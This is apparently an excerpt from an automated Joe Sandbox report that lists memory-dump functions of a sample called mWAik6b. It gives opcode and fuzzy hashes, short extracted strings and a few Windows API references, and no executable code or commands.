                          • Instruction Fuzzy Hash: C491F83365AA904BE318893D5C613AA6E830BD7334F2DC76EE5F5873E5D57888438349
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: Q$R$S
                          • API String ID: 0-2159227449
                          • Opcode ID: f44e6096533f799f1d6bea911c355f39ced8a316c778cb0647c48618ba167772
                          • Instruction ID: d9fca5815c5003eab0d0b91e92a33108a6f78dbadfc653ce5a1ea5d080195b7b
                          • Opcode Fuzzy Hash: f44e6096533f799f1d6bea911c355f39ced8a316c778cb0647c48618ba167772
                          • Instruction Fuzzy Hash: C8813837749AC04BD3189E7D5C5226ABA830BD7234F2DD77EA5F58B3E1D5B888024305
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: Q$R$S
                          • API String ID: 0-2159227449
                          • Opcode ID: 129fc2bc189664d90dba538dc882f008c33ccc94a45de0a06dfed904f8fe70a1
                          • Instruction ID: bba496a5372985bba7141437ab195e5bec31f2ea436575223504c60d37d686cd
                          • Opcode Fuzzy Hash: 129fc2bc189664d90dba538dc882f008c33ccc94a45de0a06dfed904f8fe70a1
                          • Instruction Fuzzy Hash: 6D812272B59A904BE728C93C5C512ABBA830BD3230F2DC77EE5B5873E9D57888468345
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: +!?+$?--p$c>&{
                          • API String ID: 0-3106190836
                          • Opcode ID: 7a4ff5f8cd27adef4b1ecbf93259f418dd829e203bb99b82b3cee829bc6667ce
                          • Instruction ID: 215c636fbddd9064837e7d5c3cde9a1972559525d02c12aa3c29cf55a2b0a494
                          • Opcode Fuzzy Hash: 7a4ff5f8cd27adef4b1ecbf93259f418dd829e203bb99b82b3cee829bc6667ce
                          • Instruction Fuzzy Hash: 8041E2316047918BD7298F38D490362BBF1FF57300F6896ADC4D29B796D738980ACB55
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: +!?+$?--p$c>&{
                          • API String ID: 0-3106190836
                          • Opcode ID: 4042cd04b6e45535a366894970237c2236a786ac552d274631216f560106e037
                          • Instruction ID: bcf31b72bf09cb317ee0e6cbe7a3cd916c9085281e9dee77dce07ef7badb7a1d
                          • Opcode Fuzzy Hash: 4042cd04b6e45535a366894970237c2236a786ac552d274631216f560106e037
                          • Instruction Fuzzy Hash: E14122206087918BD7268F39D490372BBB1FF57310F6896BEC0D29B796D738940ACB19
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0$8
                          • API String ID: 0-46163386
                          • Opcode ID: 15f58878d783f1e86fe4544b6f77fb079d1d1bf37b3694ae50e1066ca26427e8
                          • Instruction ID: 699146bfb0d8c33709771ddd8f2e5912583d5bcccba710f65b4bfe4c593fdc54
                          • Opcode Fuzzy Hash: 15f58878d783f1e86fe4544b6f77fb079d1d1bf37b3694ae50e1066ca26427e8
                          • Instruction Fuzzy Hash: 6E721371508340AFD714CF18C884BABBBE1AF88314F54892EF9899B391D379D958CF96
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: VW$^1
                          • API String ID: 0-1829332145
                          • Opcode ID: 8b14f776a0fb695f18afaac2e4628aa68cc99a932581994cca80ac9c1f403b24
                          • Instruction ID: a4a54bef16d968bb56b733710aebb17d2bd9bb77b83521fa0b5e17e64e22ead2
                          • Opcode Fuzzy Hash: 8b14f776a0fb695f18afaac2e4628aa68cc99a932581994cca80ac9c1f403b24
                          • Instruction Fuzzy Hash: 2612243A518311CBDB189F28E85236BB3F1EF9A310F1A887DD98583391E779C945C749
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: )$IEND
                          • API String ID: 0-707183367
                          • Opcode ID: ce31f45f53e51b5298a1ba3b0f97aa1870b531dfc6cdfbca1e31f7cbb672a44b
                          • Instruction ID: 51e0701a2f736e0020de5a9d6bdfdf17a4e5eeb61dfeb23137a348e058160d31
                          • Opcode Fuzzy Hash: ce31f45f53e51b5298a1ba3b0f97aa1870b531dfc6cdfbca1e31f7cbb672a44b
                          • Instruction Fuzzy Hash: C9D1AFB1A083449FD710DF14D84575BBBE0ABD5308F14482EFA99AB3C2D779E908CB96
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: r$vwpq
                          • API String ID: 0-3569237348
                          • Opcode ID: 22b5811a6288ad6580e0aa62d86da1741da121e3d4624062027b4ad0eecdf520
                          • Instruction ID: 34f1bbe08903e6f2d7644d1420bcd52760caa19c4d9134696cbfe5875449ea24
                          • Opcode Fuzzy Hash: 22b5811a6288ad6580e0aa62d86da1741da121e3d4624062027b4ad0eecdf520
                          • Instruction Fuzzy Hash: 29A117316482614FD7118F288C903ABBBD1AB91314F18863EE8E9C73C2D778DC46D795
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: V$fx|z
                          • API String ID: 0-681704546
                          • Opcode ID: 2cc85b762e328624723c7d7e73bb91e246728c3a78d4e4d6140cd0999c726c93
                          • Instruction ID: 80abed0833860db98ab23282628cbea41a4a846c6c6a204caba2e915d68c0275
                          • Opcode Fuzzy Hash: 2cc85b762e328624723c7d7e73bb91e246728c3a78d4e4d6140cd0999c726c93
                          • Instruction Fuzzy Hash: 8D51E32068C3C68AD3118F3994A076BFFE09FA7300F1C556EE4D45B383D2798A19D76A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: NP,?$NP,?
                          • API String ID: 0-4096726916
                          • Opcode ID: 0ccd81dbf167557dd91610d05510ded85e2f869ad8ccd5491cfbff5956cbc37d
                          • Instruction ID: 48dbf01d005bef2233451d70d6476307289bbc23adf1b6d952bfcf170c6ed0f1
                          • Opcode Fuzzy Hash: 0ccd81dbf167557dd91610d05510ded85e2f869ad8ccd5491cfbff5956cbc37d
                          • Instruction Fuzzy Hash: EA51F4B5284200EFE3149F29EC42A3B7365EB49359F29563DF1C4861E1E738AC31DB5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0$L@N/
                          • API String ID: 0-3851033181
                          • Opcode ID: f232763a1fe003d9fe3d5958c568e47221dcd94f65dac604dd2efa7f54bf0f70
                          • Instruction ID: 26f02b1c58bead0d480d1d074c86c88df01acdeab459f6cbac17582f84703378
                          • Opcode Fuzzy Hash: f232763a1fe003d9fe3d5958c568e47221dcd94f65dac604dd2efa7f54bf0f70
                          • Instruction Fuzzy Hash: E3418032A0A65047D3288A2884553FBFBE29FD3324F2CD56FD4E28B3D1C67D88458796
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: gfff
                          • API String ID: 0-1553575800
                          • Opcode ID: dcea9bafbe767d262a06a381ba1d5f444f1c6d9a53b3f9213c4a045178cfd65d
                          • Instruction ID: 624a34a7a89ed849047c046f419393cac8e99605f5e9fb2c7dc5e37e21c2652a
                          • Opcode Fuzzy Hash: dcea9bafbe767d262a06a381ba1d5f444f1c6d9a53b3f9213c4a045178cfd65d
                          • Instruction Fuzzy Hash: D5F14975200B01DFD3158F28DC517A6B7E2FF86324F59866AE4928B3E1D738A892CB44
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: NP,?
                          • API String ID: 0-3110377521
                          • Opcode ID: 1fc4cc8043242c78b92c4f1807013de54347a9bd100f12d0bc5b1819303af8e2
                          • Instruction ID: ed71476df50380b23ef9a1f47a3a6fd47854f8aedf13eb07153379707c2d5930
                          • Opcode Fuzzy Hash: 1fc4cc8043242c78b92c4f1807013de54347a9bd100f12d0bc5b1819303af8e2
                          • Instruction Fuzzy Hash: 7EF135B8608200DFD7149F24FC41B2B73A2FB8A369F16463DF594472E1E735AC658B4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: %"
                          • API String ID: 0-2085258236
                          • Opcode ID: dbeb4f93ef5105134645629967a23a71d064e0ab4c9951d1fc5fd19d56eb8d2b
                          • Instruction ID: fd7515e49f309e108fb0d05fe4366b317355d827d24263c711e8a68a1eb4f3ac
                          • Opcode Fuzzy Hash: dbeb4f93ef5105134645629967a23a71d064e0ab4c9951d1fc5fd19d56eb8d2b
                          • Instruction Fuzzy Hash: 86B16771A043209BC710DF24E891667B3E1EFA1364F59892EE8C5973A1E379EC01C796
                          APIs
                          • FreeLibrary.KERNEL32(20512912), ref: 0042FAEF
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: a675d0085f65821b857cbe5fa8690505ba68443d615610d9261d2d1a8ec1c10a
                          • Instruction ID: d14e57f2fc7486ba4c597dd22f436596394413629688b9083d46952454a91699
                          • Opcode Fuzzy Hash: a675d0085f65821b857cbe5fa8690505ba68443d615610d9261d2d1a8ec1c10a
                          • Instruction Fuzzy Hash: A2510671604B418FC3298F39C991B62BBE2FF96310F18866DD0EB4B792D738A805CB54
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: "
                          • API String ID: 0-123907689
                          • Opcode ID: dbe2ccf14b006c898e90c6bf5e5e7ddb2beffce3094603fa28b85335479f87cf
                          • Instruction ID: 3cc5fc57e0aef5fdd908038ea554fe4615dd34867f5ec22844ca8259c1362cef
                          • Opcode Fuzzy Hash: dbe2ccf14b006c898e90c6bf5e5e7ddb2beffce3094603fa28b85335479f87cf
                          • Instruction Fuzzy Hash: D4C108B2B083245BD7148E25E491B6FB7D5AF84314F59852FE89987382E738DC05C7C6
                          Strings
                          • 0010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00444295
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                          • API String ID: 0-2906481384
                          • Opcode ID: 1c1e5b343b5f5be26c73ef23fea176e5d9164165e68c461e7e83fb8f69db2409
                          • Instruction ID: 35d6a1398312f27843b3ffa60af843551babef451e1f15d2099fa38036f352d1
                          • Opcode Fuzzy Hash: 1c1e5b343b5f5be26c73ef23fea176e5d9164165e68c461e7e83fb8f69db2409
                          • Instruction Fuzzy Hash: DFC190B54693D1AEDB979F3084912A37FA1EF4B71935A61EEC9C38E423C1219443DB82
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: ivv(
                          • API String ID: 0-2076575229
                          • Opcode ID: 9db098ea2be8d5bc3d78aca8f14f5f0ba940a6c2fd450fc85c65b2c7b3f7e3b7
                          • Instruction ID: ee854e163e0a9ae499fc097e4303c8416cb1968dc3ae962d096e5634b3b02f77
                          • Opcode Fuzzy Hash: 9db098ea2be8d5bc3d78aca8f14f5f0ba940a6c2fd450fc85c65b2c7b3f7e3b7
                          • Instruction Fuzzy Hash: 31B12C11305BA04AD739CE399492733FFF2AF97204798857ED9E38F796C2299409C719
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: NP,?
                          • API String ID: 0-3110377521
                          • Opcode ID: 24ee418301d1e3e2a76f7cc3c08a7693e36fa7a323527c672ae3796b63d451f1
                          • Instruction ID: 7efe3748151cd412c05864b04fb60aa68add1eac6ee24d97721fcf29b43c1992
                          • Opcode Fuzzy Hash: 24ee418301d1e3e2a76f7cc3c08a7693e36fa7a323527c672ae3796b63d451f1
                          • Instruction Fuzzy Hash: 1EA157756043149BD314CF25D88173FB2A2EBCD324F19A62EEA99573D1D734AC0187DA
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: D{QG
                          • API String ID: 0-646852577
                          • Opcode ID: 6e5689c480d000d2be46e2000064dc93eda3fe9f3d1c3e6b08723c83b175fb69
                          • Instruction ID: e59830187f25f18f3dca04f9172d13e8a3e351c968dd71db551bed0e76eb6d97
                          • Opcode Fuzzy Hash: 6e5689c480d000d2be46e2000064dc93eda3fe9f3d1c3e6b08723c83b175fb69
                          • Instruction Fuzzy Hash: 56C11575A0C240DFD3148F24E84166BBBE2EF96314F44892EF8D5833A6D7389916CB4B
                          APIs
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A970
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: EnvironmentExpandStrings
                          • String ID:
                          • API String ID: 237503144-0
                          • Opcode ID: d497561dd927b754de1b99b9c5bed46785759a9d0818afae6f79f2768f494328
                          • Instruction ID: 5756e75fc9f1f392b5139d42523d97b9f2dfad06c4b5b94dc71d61d448cf387c
                          • Opcode Fuzzy Hash: d497561dd927b754de1b99b9c5bed46785759a9d0818afae6f79f2768f494328
                          • Instruction Fuzzy Hash: 7331007125C3909FE7148F29988175FBBE1EBC2390FA55E2CE5D29B290C674C406CB82
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,
                          • API String ID: 0-3772416878
                          • Opcode ID: ea6e413899db9eaae31c1f230be2a2d1c99fe2cab4d58240bebb2e142d6aa263
                          • Instruction ID: e3c8b5d64c5bee03d1c54c1dcaad6eb4536802655b5c2b5cc59df3c9393bbe2d
                          • Opcode Fuzzy Hash: ea6e413899db9eaae31c1f230be2a2d1c99fe2cab4d58240bebb2e142d6aa263
                          • Instruction Fuzzy Hash: EAB138712087819FD320CF28C98065BBBE0AFA9704F444E2DF5D997382D635EA18CB97
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: ./l
                          • API String ID: 0-1335132034
                          • Opcode ID: bed1f0383ae48b5c8c9d205809927c71a7c694a259de8c2c1ef1bc547f49e58e
                          • Instruction ID: b289e211df99c85e2664ecfaabed283bef56db528c57625e9465d19fa1ef3ce7
                          • Opcode Fuzzy Hash: bed1f0383ae48b5c8c9d205809927c71a7c694a259de8c2c1ef1bc547f49e58e
                          • Instruction Fuzzy Hash: 0E81F7766043159FD3248F18D880A6BB3E2FBC5354F1A863DE9950B3A1DB74EC91CB85
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: "
                          • API String ID: 0-123907689
                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                          • Instruction ID: 9c834c09413cd93179149bc9e5d7192b045285f06e9c79078028573f5268d204
                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                          • Instruction Fuzzy Hash: C171F832F083358BD714CE28E58031FB7E2ABC5710FA9856FE89497395D639DC45878A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: 3q.T
                          • API String ID: 0-4058519285
                          • Opcode ID: c3138fd22b3c40d06f4287d6351af31a5a4e206bea89ea2ad73e9ce3c814ac4c
                          • Instruction ID: 2b1c7bb352a7c801001ecabb7a8b4055da840c1ac2f4091a3cc32021bb4b54c6
                          • Opcode Fuzzy Hash: c3138fd22b3c40d06f4287d6351af31a5a4e206bea89ea2ad73e9ce3c814ac4c
                          • Instruction Fuzzy Hash: C6410336B583604BD708CF29988016BF7D3ABCE714F1EA97E9894D3352CA78DC058785
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: chaf
                          • API String ID: 0-2518975458
                          • Opcode ID: 4d27b5c89c262d2e3014d832c5e168e728c51cba840a87b42eb4fb49f94c899e
                          • Instruction ID: 19d5331320da2fa72a555803d4b7d97efff6d86ad64ed1cdd5d00f76fa907a3a
                          • Opcode Fuzzy Hash: 4d27b5c89c262d2e3014d832c5e168e728c51cba840a87b42eb4fb49f94c899e
                          • Instruction Fuzzy Hash: 0411A1317182804BD758CF39D862AEFB7E2EBC2318F159A3DD492C3295DB38C5058745
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4180f55e1250d971439fd2b342f67f21dc5b60a3d19bfa54fd0ddef72b126db0
                          • Instruction ID: aba7926241b060bb06b1f24f3d243b8d731ef579397285a429534e5fc020267e
                          • Opcode Fuzzy Hash: 4180f55e1250d971439fd2b342f67f21dc5b60a3d19bfa54fd0ddef72b126db0
                          • Instruction Fuzzy Hash: 8A626CB0619B808ED325CF3C8855797BFE5AB5A324F148B5EA0FA873D2C7756001CB66
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 973e227494078477f1a923e6f023bf89345cb38fd52a5f6582697699c70aeaea
                          • Instruction ID: a7b0ffe9829c724f1e6294d578d403fab340fd7f7d512ac846d8dad4e0a95d04
                          • Opcode Fuzzy Hash: 973e227494078477f1a923e6f023bf89345cb38fd52a5f6582697699c70aeaea
                          • Instruction Fuzzy Hash: F712043A798311CFD304CF78E89016AB3E2FB8A314F09897DDA8587351D675D861DB86
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 994c1b8603f56c000878a7d132dec4228935308d023dd71853bbcff6ad92fa94
                          • Instruction ID: 2a898b07e1549c45b482457cae0ea9e3b447b6a19680c51ed019287fb59a0def
                          • Opcode Fuzzy Hash: 994c1b8603f56c000878a7d132dec4228935308d023dd71853bbcff6ad92fa94
                          • Instruction Fuzzy Hash: 6352F2715083458FCB15CF14C0806AABBE5FF88315F18897EF8996B381D778EA49CB85
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c7cab67eb842c0e46ea36811c21e654b9b5a0ce7057876f0d2541d88d5f52e5
                          • Instruction ID: a2f5354f3e6274ecf5255cbf2344162a4b315ddca2e503580445e149aa846253
                          • Opcode Fuzzy Hash: 4c7cab67eb842c0e46ea36811c21e654b9b5a0ce7057876f0d2541d88d5f52e5
                          • Instruction Fuzzy Hash: F652D2B0A08B848FE731DB24C4843A7BBE1AB51314F15893FD5E7167C2C37DA9958B1A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e55b0573e8e7c2abcf2727a4ec02e320dc7192fb951992d219391c0a231855e
                          • Instruction ID: 064281aa2893c7288788ca0de4be919a87bcd640dafece75682fc7d4e400d4f5
                          • Opcode Fuzzy Hash: 1e55b0573e8e7c2abcf2727a4ec02e320dc7192fb951992d219391c0a231855e
                          • Instruction Fuzzy Hash: 5112A172A087118BC725DE18D9806ABB3E1FFC4315F19893ED986A7385D738B815CB87
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a8abcbda8ca15df79b7243b196882187bb24b0f1d024926342cd946fc0578da5
                          • Instruction ID: d64160a74ec60d7125ab45d05151f6d5cfd32d6d6f0f77b8d848c4fc0a00946f
                          • Opcode Fuzzy Hash: a8abcbda8ca15df79b7243b196882187bb24b0f1d024926342cd946fc0578da5
                          • Instruction Fuzzy Hash: AA021239798311CFD308CF78E89012AB7E2FBCA314F0989BDDA8587351D675D8519B86
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a7d25e235a88682db571435d47b71176ca0386be4b33a3909dcae094bd9f16a6
                          • Instruction ID: c425eaba3b3d89dd97bc2fbeaf8ddbe26413e5934e5283c1d55bf64785f81235
                          • Opcode Fuzzy Hash: a7d25e235a88682db571435d47b71176ca0386be4b33a3909dcae094bd9f16a6
                          • Instruction Fuzzy Hash: 2A323370914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b21d4f9ba95d410a7596c2c6785d02bf5f63f54d271306b77497ee52d1e4ec63
                          • Instruction ID: da4009ebc5983869682d44f3c4a24e9c93c6984ab2b49a976a8e3bced951d3be
                          • Opcode Fuzzy Hash: b21d4f9ba95d410a7596c2c6785d02bf5f63f54d271306b77497ee52d1e4ec63
                          • Instruction Fuzzy Hash: B1425CB1504B819FD355CF39C855793BFE0AB16214F088AAEE4EACB382D636E145CB91
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1faf2931fa9d1bcad18e4e415644bfd94d55ad16d2257e47073b34bf2ec57896
                          • Instruction ID: d001879c763d37507c293f3e6f10316158db88ccc81abb2f372b085dfdc14dca
                          • Opcode Fuzzy Hash: 1faf2931fa9d1bcad18e4e415644bfd94d55ad16d2257e47073b34bf2ec57896
                          • Instruction Fuzzy Hash: A4E1133AB98311CFD308CF68D88052AB7E2FBCA314F0989BDD98587351D675D851DB85
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0de6948366018f2c3533d44458fc2c4a7833dc0d202c75254068e6e7134d4cab
                          • Instruction ID: 134dce1f646dbbe1521ca19dbcf71fef002f06be88bb9d5341bc53780075cb97
                          • Opcode Fuzzy Hash: 0de6948366018f2c3533d44458fc2c4a7833dc0d202c75254068e6e7134d4cab
                          • Instruction Fuzzy Hash: 9B02D0B0610B01DFD724CF24C891BA3B7B2FF86314F19865DD49A8B7A5D738A851CB58
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
